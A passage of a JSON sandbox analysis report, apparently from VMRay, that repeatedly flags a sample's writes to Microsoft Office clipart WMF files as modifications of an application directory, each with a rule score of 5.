files\\microsoft office\\clipart\\pub60cor\\na01158_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01161_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01161_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40336", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01161_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01164_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01164_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40343", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01164_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01293_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01293_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40350", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01293_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01354_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01354_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40359", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01354_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01356_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01356_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40366", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01356_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01357_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01357_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40375", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01357_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01358_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01358_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40384", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01358_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01361_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01361_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40391", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01361_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01368_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01368_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40398", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01368_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01421_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01421_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40437", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01421_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01468_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01468_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40464", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01468_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01470_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01470_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40473", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01470_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01472_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01472_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40482", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01472_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01473_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01473_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40489", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01473_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01474_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01474_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40496", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01474_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01627_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01627_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40503", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01627_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01680_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01680_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40510", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01680_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01682_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01682_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40517", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01682_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01701_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01701_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40524", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01701_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01848_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01848_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40531", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01848_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01849_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01849_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40538", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01849_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01852_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01852_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40545", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01852_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01858_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01858_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40552", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01858_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01866_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01866_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40559", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01866_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02009_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02009_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40566", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02009_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02041_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02041_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40573", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02041_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02066_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02066_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40580", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02066_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02091_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02091_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40587", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02091_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02092_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02092_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40594", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02092_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02093_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02093_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40601", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02093_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02124_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02124_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40608", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02124_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02125_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02125_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40615", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02125_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02126_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02126_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, 